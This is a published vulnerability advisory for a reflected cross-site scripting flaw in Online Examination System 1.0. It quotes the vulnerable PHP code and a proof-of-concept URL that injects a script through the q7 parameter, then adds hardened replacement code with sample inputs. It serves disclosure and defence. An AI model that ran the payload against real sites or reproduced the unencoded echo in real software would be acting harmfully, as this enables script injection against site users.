Online Examination System 1.0 Cross Site Scripting

2022.09.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Online Examination System - Cross site scripting Reflected
# Google Dork: N/A
# Date: 2022-9-29
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

Vulnerability Details
======================

Steps :

Vulnerable code in file index.php, lines 157-158:

<?php if(@$_GET['q7'])
{ echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>

http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E

The payload is injected through the q7 parameter, which is echoed into the page without output encoding.
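The echo shown above can be hardened by encoding the parameter for the HTML text context before it is written. This is an added example, not code from the advisory or the project: render_notice() is a hypothetical helper name, the sample inputs are constructed, and PHP 8 with the mbstring extension is assumed.

```php
<?php
declare(strict_types=1);

/**
 * Hardened replacement for the echo at index.php lines 157-158.
 * render_notice() is a hypothetical helper, not part of the project.
 */
function render_notice(mixed $raw, int $maxLen = 200): string
{
    // ?q7[]=x arrives as an array; anything but a non-empty string
    // is treated as "no message" instead of being echoed.
    if (!is_string($raw) || $raw === '') {
        return '';
    }

    // Bound the length of attacker-controlled text placed in the page.
    $text = mb_substr($raw, 0, $maxLen, 'UTF-8');

    // Encode for HTML: <, >, &, " and ' become entities, so the value
    // cannot close the <p> element or open a <script> element.
    // ENT_SUBSTITUTE replaces invalid UTF-8 rather than returning ''.
    $safe = htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');

    // The original markup never closed the paragraph; close it here.
    return '<p style="color:red;font-size:15px;">' . $safe . '</p>';
}

// Before (as in the advisory): the parameter is echoed unencoded.
//   echo '<p style="color:red;font-size:15px;">' . @$_GET['q7'];
// After (in index.php):
//   echo render_notice($_GET['q7'] ?? null);

// Constructed sample inputs, run only from the command line.
if (PHP_SAPI === 'cli') {
    $samples = [
        'Login failed',                          // benign notice text
        '"><script>alert("yousef");</script>',   // decoded q7 value from the advisory URL
        ['nested'],                              // q7[]=nested
    ];
    foreach ($samples as $sample) {
        var_dump(render_notice($sample));
    }
}
```

Run from the command line, the script dumps the markup produced for each sample, which shows the advisory's q7 value emitted as inert text rather than as markup.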



Copyright 2022, cxsecurity.com

 
